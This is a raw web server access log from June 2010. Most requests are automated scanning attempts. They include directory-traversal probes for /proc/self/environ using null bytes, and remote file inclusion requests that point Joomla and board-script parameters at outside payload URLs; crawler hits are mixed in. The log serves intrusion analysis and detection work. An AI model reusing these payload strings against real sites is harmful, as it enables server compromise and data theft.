66.223.110.205 - - [02/Jun/2010:03:13:49 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
66.223.110.205 - - [02/Jun/2010:03:14:03 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
66.223.110.205 - - [02/Jun/2010:03:14:03 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
208.71.174.218 - - [02/Jun/2010:03:14:07 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
208.71.174.218 - - [02/Jun/2010:03:14:07 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
208.71.174.218 - - [02/Jun/2010:03:14:07 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
208.71.174.218 - - [02/Jun/2010:03:14:07 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
89.145.108.230 - - [02/Jun/2010:03:14:08 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.145.108.230 - - [02/Jun/2010:03:14:08 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
89.145.108.230 - - [02/Jun/2010:03:14:16 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.145.108.230 - - [02/Jun/2010:03:14:16 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
89.145.108.230 - - [02/Jun/2010:03:14:33 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.145.108.230 - - [02/Jun/2010:03:14:33 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
216.129.119.43 - - [02/Jun/2010:03:19:54 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
78.48.165.158 - - [02/Jun/2010:03:23:36 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
207.46.204.236 - - [02/Jun/2010:03:23:56 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
202.190.174.181 - - [02/Jun/2010:03:24:40 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.sdit-alfirdaus.sch.id/components/com_sef/1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
202.190.174.181 - - [02/Jun/2010:03:24:40 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.sdit-alfirdaus.sch.id/components/com_sef/1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
202.190.174.181 - - [02/Jun/2010:03:24:40 -0500] "GET /logs/access_log.1273795200//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.sdit-alfirdaus.sch.id/components/com_sef/1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
202.190.174.181 - - [02/Jun/2010:03:26:54 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.sdit-alfirdaus.sch.id/components/com_sef/1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
202.190.174.181 - - [02/Jun/2010:03:26:54 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.sdit-alfirdaus.sch.id/components/com_sef/1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
202.190.174.181 - - [02/Jun/2010:03:26:54 -0500] "GET /logs/access_log.1274832000//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.sdit-alfirdaus.sch.id/components/com_sef/1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
173.192.12.194 - - [02/Jun/2010:03:27:19 -0500] "GET /logs/access_log.1271548800///bbs///write_comment_update.php?board_skin_path=http://Fix29ID.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
173.192.12.194 - - [02/Jun/2010:03:27:19 -0500] "GET ///bbs///write_comment_update.php?board_skin_path=http://Fix29ID.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
173.192.12.194 - - [02/Jun/2010:03:27:19 -0500] "GET /logs///bbs///write_comment_update.php?board_skin_path=http://Fix29ID.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
222.236.47.182 - - [02/Jun/2010:03:28:56 -0500] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kipdyd.uni.opole.pl//podyplom/admin/scroll.gif?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
222.236.47.182 - - [02/Jun/2010:03:28:56 -0500] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kipdyd.uni.opole.pl//podyplom/admin/scroll.gif?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
222.236.47.182 - - [02/Jun/2010:03:28:57 -0500] "GET /logs/access_log.1270512000/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kipdyd.uni.opole.pl//podyplom/admin/scroll.gif?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
222.236.47.182 - - [02/Jun/2010:03:28:59 -0500] "GET /logs/access_log.1270771200/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kipdyd.uni.opole.pl//podyplom/admin/scroll.gif?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
222.236.47.182 - - [02/Jun/2010:03:29:11 -0500] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kipdyd.uni.opole.pl//podyplom/admin/scroll.gif?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
222.236.47.182 - - [02/Jun/2010:03:29:11 -0500] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kipdyd.uni.opole.pl//podyplom/admin/scroll.gif?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
222.236.47.182 - - [02/Jun/2010:03:29:11 -0500] "GET /logs/access_log.1270512000/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kipdyd.uni.opole.pl//podyplom/admin/scroll.gif?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
222.236.47.182 - - [02/Jun/2010:03:29:16 -0500] "GET /logs/access_log.1270771200/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kipdyd.uni.opole.pl//podyplom/admin/scroll.gif?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
75.136.121.230 - - [02/Jun/2010:03:34:54 -0500] "GET /logs/access_log.1271548800//modules/agendax/addevent.inc.php?agendax_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
75.136.121.230 - - [02/Jun/2010:03:34:54 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
75.136.121.230 - - [02/Jun/2010:03:34:55 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
207.46.204.185 - - [02/Jun/2010:03:35:10 -0500] "GET /logs/access_log.1233014400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
173.192.12.194 - - [02/Jun/2010:03:42:30 -0500] "GET /logs///bbs///write_comment_update.php?board_skin_path=http://Fix29ID.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
173.192.12.194 - - [02/Jun/2010:03:42:30 -0500] "GET /logs/access_log.1271548800///bbs///write_comment_update.php?board_skin_path=http://Fix29ID.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
173.192.12.194 - - [02/Jun/2010:03:42:30 -0500] "GET ///bbs///write_comment_update.php?board_skin_path=http://Fix29ID.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
194.100.228.237 - - [02/Jun/2010:03:42:51 -0500] "GET /logs/access_log.1274832000//index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
194.100.228.237 - - [02/Jun/2010:03:42:51 -0500] "GET /logs/access_log.1274832000//index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
194.100.228.237 - - [02/Jun/2010:03:42:52 -0500] "GET //index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
194.100.228.237 - - [02/Jun/2010:03:42:52 -0500] "GET //index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
194.100.228.237 - - [02/Jun/2010:03:42:52 -0500] "GET /logs//index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
194.100.228.237 - - [02/Jun/2010:03:42:52 -0500] "GET /logs//index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
74.55.43.66 - - [02/Jun/2010:03:45:00 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
199.120.90.223 - - [02/Jun/2010:03:46:15 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
199.120.90.223 - - [02/Jun/2010:03:46:16 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
199.120.90.223 - - [02/Jun/2010:03:46:16 -0500] "GET /logs/access_log.1271548800/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 371 "-""Mozilla/5.0"
218.146.255.196 - - [02/Jun/2010:03:46:30 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
194.32.151.185 - - [02/Jun/2010:03:46:48 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=http://vutanet.com/1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:03:46:48 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=http://vutanet.com/1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:03:46:48 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=http://vutanet.com/1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:03:46:57 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=http://vutanet.com/1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:03:46:57 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=http://vutanet.com/1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:03:46:57 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=http://vutanet.com/1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
195.190.166.35 - - [02/Jun/2010:03:47:22 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.defsa.org.za/e107_plugins/autogallery/Log/id.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.65"
195.190.166.35 - - [02/Jun/2010:03:47:22 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.defsa.org.za/e107_plugins/autogallery/Log/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.65"
199.120.90.223 - - [02/Jun/2010:03:48:56 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
199.120.90.223 - - [02/Jun/2010:03:48:57 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
199.120.90.223 - - [02/Jun/2010:03:48:57 -0500] "GET /logs/access_log.1271548800/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 371 "-""Mozilla/5.0"
207.46.13.89 - - [02/Jun/2010:03:49:40 -0500] "GET /logs/access_log.1230163200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
63.247.81.130 - - [02/Jun/2010:03:51:22 -0500] "GET /homepage.php?sel=http://mjkl.interfree.it/id.jpg?? HTTP/1.1" 404 296 "-""libwww-perl/5.831"
63.247.81.130 - - [02/Jun/2010:03:51:24 -0500] "GET /logs/homepage.php?sel=http://mjkl.interfree.it/id.jpg?? HTTP/1.1" 404 301 "-""libwww-perl/5.831"
74.55.43.66 - - [02/Jun/2010:03:54:27 -0500] "GET /logs/access_log.1274832000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.55.43.66 - - [02/Jun/2010:03:54:27 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.55.43.66 - - [02/Jun/2010:03:54:28 -0500] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
173.192.12.194 - - [02/Jun/2010:03:54:35 -0500] "GET /logs/access_log.1271548800///bbs///write_comment_update.php?board_skin_path=http://Fix29ID.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
173.192.12.194 - - [02/Jun/2010:03:54:35 -0500] "GET ///bbs///write_comment_update.php?board_skin_path=http://Fix29ID.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
173.192.12.194 - - [02/Jun/2010:03:54:35 -0500] "GET /logs///bbs///write_comment_update.php?board_skin_path=http://Fix29ID.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
173.192.12.194 - - [02/Jun/2010:03:54:52 -0500] "GET /logs///bbs///write_comment_update.php?board_skin_path=http://Fix29ID.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
173.192.12.194 - - [02/Jun/2010:03:54:52 -0500] "GET ///bbs///write_comment_update.php?board_skin_path=http://Fix29ID.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
173.192.12.194 - - [02/Jun/2010:03:54:53 -0500] "GET /logs/access_log.1271548800///bbs///write_comment_update.php?board_skin_path=http://Fix29ID.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
74.55.43.66 - - [02/Jun/2010:03:54:59 -0500] "GET /logs/access_log.1274832000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.55.43.66 - - [02/Jun/2010:03:55:00 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.55.43.66 - - [02/Jun/2010:03:55:00 -0500] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
218.146.255.196 - - [02/Jun/2010:03:58:02 -0500] "GET /logs/access_log.1274832000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
218.146.255.196 - - [02/Jun/2010:03:58:03 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
218.146.255.196 - - [02/Jun/2010:03:58:03 -0500] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
194.32.151.185 - - [02/Jun/2010:03:59:59 -0500] "GET /logs/access_log.1272585600/?option=com_ninjarsssyndicator&controller=http://vutanet.com/1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:03:59:59 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://vutanet.com/1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:03:59:59 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://vutanet.com/1.txt? HTTP/1.1" 200 7924 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:00:10 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://vutanet.com/1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:00:10 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://vutanet.com/1.txt? HTTP/1.1" 200 7924 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:00:10 -0500] "GET /logs/access_log.1272585600/?option=com_ninjarsssyndicator&controller=http://vutanet.com/1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.195.112.180 - - [02/Jun/2010:04:00:45 -0500] "GET /logs/access_log.1233705600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
173.192.12.194 - - [02/Jun/2010:04:02:16 -0500] "GET /logs///bbs///write_comment_update.php?board_skin_path=http://Fix29ID.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
173.192.12.194 - - [02/Jun/2010:04:02:16 -0500] "GET ///bbs///write_comment_update.php?board_skin_path=http://Fix29ID.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
173.192.12.194 - - [02/Jun/2010:04:02:16 -0500] "GET /logs/access_log.1271548800///bbs///write_comment_update.php?board_skin_path=http://Fix29ID.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
74.55.43.66 - - [02/Jun/2010:04:03:54 -0500] "GET /logs/access_log.1274313600/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
216.129.119.43 - - [02/Jun/2010:04:05:38 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [02/Jun/2010:04:06:00 -0500] "GET /logs/access_log.1269302400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
173.192.12.194 - - [02/Jun/2010:04:06:16 -0500] "GET /logs///bbs///write_comment_update.php?board_skin_path=http://Fix29ID.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
173.192.12.194 - - [02/Jun/2010:04:06:16 -0500] "GET /logs/access_log.1271548800///bbs///write_comment_update.php?board_skin_path=http://Fix29ID.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
173.192.12.194 - - [02/Jun/2010:04:06:16 -0500] "GET ///bbs///write_comment_update.php?board_skin_path=http://Fix29ID.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
173.192.12.194 - - [02/Jun/2010:04:07:52 -0500] "GET /logs/access_log.1272499200///bbs///write_comment_update.php?board_skin_path=http://Fix29ID.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
173.192.12.194 - - [02/Jun/2010:04:08:37 -0500] "GET /logs/access_log.1272499200///bbs///write_comment_update.php?board_skin_path=http://Fix29ID.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
207.46.195.224 - - [02/Jun/2010:04:11:38 -0500] "GET /logs/access_log.1234310400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
123.243.67.208 - - [02/Jun/2010:04:12:04 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
218.146.255.196 - - [02/Jun/2010:04:12:56 -0500] "GET /logs/access_log.1274313600/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
125.248.150.84 - - [02/Jun/2010:04:13:03 -0500] "GET /logs//write_comment_update.php?board_skin_path=http://kangnung.org/zb/idxx.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
125.248.150.84 - - [02/Jun/2010:04:13:03 -0500] "GET /logs/access_log.1271548800//write_comment_update.php?board_skin_path=http://kangnung.org/zb/idxx.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
125.248.150.84 - - [02/Jun/2010:04:13:03 -0500] "GET //write_comment_update.php?board_skin_path=http://kangnung.org/zb/idxx.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
207.46.13.45 - - [02/Jun/2010:04:13:14 -0500] "GET /logs/access_log.1253145600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
77.222.56.62 - - [02/Jun/2010:04:13:15 -0500] "GET //ashnews.php?pathtoashnews=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
77.222.56.62 - - [02/Jun/2010:04:13:16 -0500] "GET /logs//ashnews.php?pathtoashnews=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
194.32.151.185 - - [02/Jun/2010:04:13:41 -0500] "GET /logs/*.?option=com_abbrev&controller=http://vutanet.com/1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:13:41 -0500] "GET /*.?option=com_abbrev&controller=http://vutanet.com/1.txt?? HTTP/1.1" 404 286 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:13:41 -0500] "GET /logs/access_log.1274832000/*.?option=com_abbrev&controller=http://vutanet.com/1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
64.151.192.11 - - [02/Jun/2010:04:13:51 -0500] "GET /logs/*.?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""libwww-perl/5.805"
64.151.192.11 - - [02/Jun/2010:04:13:51 -0500] "GET /*.?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.805"
194.32.151.185 - - [02/Jun/2010:04:13:54 -0500] "GET /*.?option=com_abbrev&controller=http://vutanet.com/1.txt?? HTTP/1.1" 404 286 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:13:54 -0500] "GET /logs/*.?option=com_abbrev&controller=http://vutanet.com/1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:13:54 -0500] "GET /logs/access_log.1274832000/*.?option=com_abbrev&controller=http://vutanet.com/1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
91.121.145.89 - - [02/Jun/2010:04:14:01 -0500] "GET /*.?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.803"
194.32.151.185 - - [02/Jun/2010:04:14:08 -0500] "GET /*.?option=com_abbrev&controller=http://vutanet.com/1.txt? HTTP/1.1" 404 286 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:14:08 -0500] "GET /logs/*.?option=com_abbrev&controller=http://vutanet.com/1.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:14:09 -0500] "GET /logs/access_log.1274832000/*.?option=com_abbrev&controller=http://vutanet.com/1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:14:10 -0500] "GET /*.?option=com_abbrev&controller=http://vutanet.com/1.txt? HTTP/1.1" 404 286 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:14:10 -0500] "GET /logs/access_log.1274832000/*.?option=com_abbrev&controller=http://vutanet.com/1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:14:10 -0500] "GET /logs/*.?option=com_abbrev&controller=http://vutanet.com/1.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
64.151.192.11 - - [02/Jun/2010:04:14:15 -0500] "GET /*.?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.805"
125.248.150.84 - - [02/Jun/2010:04:14:48 -0500] "GET //write_comment_update.php?board_skin_path=http://kangnung.org/zb/idxx.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
125.248.150.84 - - [02/Jun/2010:04:14:48 -0500] "GET /logs//write_comment_update.php?board_skin_path=http://kangnung.org/zb/idxx.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
125.248.150.84 - - [02/Jun/2010:04:14:48 -0500] "GET /logs/access_log.1271548800//write_comment_update.php?board_skin_path=http://kangnung.org/zb/idxx.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:16:37 -0500] "GET /?option=com_juliaportfolio&controller=http://vutanet.com/1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:16:37 -0500] "GET /logs/?option=com_juliaportfolio&controller=http://vutanet.com/1.txt?? HTTP/1.1" 200 7924 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:16:37 -0500] "GET /logs/access_log.1274832000/?option=com_juliaportfolio&controller=http://vutanet.com/1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:16:39 -0500] "GET /?option=com_juliaportfolio&controller=http://vutanet.com/1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:16:39 -0500] "GET /logs/?option=com_juliaportfolio&controller=http://vutanet.com/1.txt? HTTP/1.1" 200 7924 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:16:40 -0500] "GET /logs/access_log.1274832000/?option=com_juliaportfolio&controller=http://vutanet.com/1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:16:41 -0500] "GET /logs/?option=com_juliaportfolio&controller=http://vutanet.com/1.txt?? HTTP/1.1" 200 7924 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:16:41 -0500] "GET /?option=com_juliaportfolio&controller=http://vutanet.com/1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:16:41 -0500] "GET /logs/access_log.1274832000/?option=com_juliaportfolio&controller=http://vutanet.com/1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
91.121.145.89 - - [02/Jun/2010:04:16:51 -0500] "GET /logs/access_log.1274832000/*.?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-""libwww-perl/5.803"
194.32.151.185 - - [02/Jun/2010:04:16:51 -0500] "GET /?option=com_juliaportfolio&controller=http://vutanet.com/1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:16:51 -0500] "GET /logs/?option=com_juliaportfolio&controller=http://vutanet.com/1.txt? HTTP/1.1" 200 7924 "-""Mozilla/5.0"
194.32.151.185 - - [02/Jun/2010:04:16:51 -0500] "GET /logs/access_log.1274832000/?option=com_juliaportfolio&controller=http://vutanet.com/1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
